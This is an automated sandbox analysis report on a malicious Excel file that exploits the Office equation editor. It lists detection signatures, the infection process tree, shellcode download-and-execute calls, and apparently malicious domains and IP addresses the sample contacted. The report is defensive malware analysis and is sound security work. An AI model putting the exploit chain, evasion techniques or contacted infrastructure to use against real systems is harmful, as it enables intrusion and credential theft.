Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IND24072113.xlsx

Overview

General Information

Sample name:IND24072113.xlsx
Analysis ID:1539299
MD5:22d0a21eddbb4653bd17a2661616c83d
SHA1:2e63451d91b759c83f5ade2a461a8db913d9a06d
SHA256:7aa5dd9473b19ca966efa3964d26773ea6d5c479debffd5d9233b16b05324d67
Tags:xlsxuser-TeamDreier
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Contains functionality to detect sleep reduction / modifications
Document exploit detected (process start blacklist hit)
Found direct / indirect Syscall (likely to bypass EDR)
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3292 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3448 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • word.exe (PID: 3600 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: A6BF416D4380AEA9DAF376E06878F0F7)
        • svchost.exe (PID: 3636 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
          • uAjPOONiWk.exe (PID: 652 cmdline: "C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • msinfo32.exe (PID: 3676 cmdline: "C:\Windows\SysWOW64\msinfo32.exe" MD5: 5F2122888583347C9B81724CF169EFC6)
              • uAjPOONiWk.exe (PID: 1696 cmdline: "C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 3908 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x1bb:$s1: <legacyDrawing r:id="
  • 0x1e3:$s2: <oleObject progId="
  • 0x238:$s3: autoLoad="true"

Sigma Signatures

Exploits

barindex
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.255.145, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3448, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Sigma detected: File Dropped By EQNEDT32EXE
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3448, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exe

System Summary

barindex
Sigma detected: Equation Editor Network Connection
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3448, Protocol: tcp, SourceIp: 192.3.255.145, SourceIsIpv6: false, SourcePort: 80
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Source: Process startedAuthor: Jason Lynch: Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\word.exe, NewProcessName: C:\Users\user\AppData\Roaming\word.exe, OriginalFileName: C:\Users\user\AppData\Roaming\word.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3448, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 3600, ProcessName: word.exe
Sigma detected: Suspicious Microsoft Office Child Process
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\word.exe, NewProcessName: C:\Users\user\AppData\Roaming\word.exe, OriginalFileName: C:\Users\user\AppData\Roaming\word.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3448, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 3600, ProcessName: word.exe
Sigma detected: Uncommon Svchost Parent Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\word.exe, ParentImage: C:\Users\user\AppData\Roaming\word.exe, ParentProcessId: 3600, ParentProcessName: word.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 3636, ProcessName: svchost.exe
Sigma detected: Modification of IE Registry Settings
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3448, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\word.exe, ParentImage: C:\Users\user\AppData\Roaming\word.exe, ParentProcessId: 3600, ParentProcessName: word.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 3636, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: IND24072113.xlsxAvira: detected
Multi AV Scanner detection for submitted file
Source: IND24072113.xlsxReversingLabs: Detection: 68%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\word.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exeJoe Sandbox ML: detected

Exploits

barindex
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.3.255.145 Port: 80Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.3.255.145 Port: 443Jump to behavior
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 192.3.255.145:443 -> 192.168.2.22:49162 version: TLS 1.2
Source: Binary string: msinfo32.pdb source: svchost.exe, 00000006.00000003.490616533.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000003.484856022.00000000006B5000.00000004.00000001.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639642478.00000000006DB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: msinfo32.pdb@ source: svchost.exe, 00000006.00000003.490616533.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000003.484856022.00000000006B5000.00000004.00000001.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639642478.00000000006DB000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uAjPOONiWk.exe, 00000007.00000000.481547931.00000000008DE000.00000002.00000001.01000000.00000005.sdmp, uAjPOONiWk.exe, 00000009.00000002.639603944.00000000008DE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdb source: word.exe, 00000005.00000003.429340915.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, word.exe, 00000005.00000003.428942724.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.497270850.0000000000870000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.479680462.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.497270850.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.479390301.0000000000450000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000003.498304702.0000000000A40000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000003.498006894.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000002.639750700.0000000002270000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000008.00000002.639750700.00000000020F0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: msinfo32.exe, 00000008.00000002.639902126.000000000299C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 00000008.00000002.639530114.00000000002D6000.00000004.00000020.00020000.00000000.sdmp, uAjPOONiWk.exe, 00000009.00000000.510508746.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.552686971.000000000139C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452126
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,5_2_0045C999
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,5_2_00436ADE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00434BEE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,5_2_00436D2D
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442E1F
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045DD7C FindFirstFileW,FindClose,5_2_0045DD7C
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD29
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00475FE5
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8D

Software Vulnerabilities

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Shellcode detected
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03601822 LoadLibraryW,2_2_03601822
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036018E6 WinExec,ExitProcess,2_2_036018E6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0360189B URLDownloadToFileW,2_2_0360189B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03601906 ExitProcess,2_2_03601906
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0360183C URLDownloadToFileW,2_2_0360183C
Source: global trafficDNS query: name: timurtrading.my
Source: global trafficDNS query: name: www.omnibizlux.biz
Source: global trafficDNS query: name: www.sqlite.org
Source: global trafficDNS query: name: www.sqlite.org
Source: global trafficDNS query: name: www.75e296qdx.top
Source: global trafficDNS query: name: www.myprefpal.xyz
Source: global trafficDNS query: name: www.jilifish.win
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.255.145:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 167.172.133.32:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 45.33.6.223:80
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 185.196.10.234:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 3.33.130.190:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 15.197.148.33:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
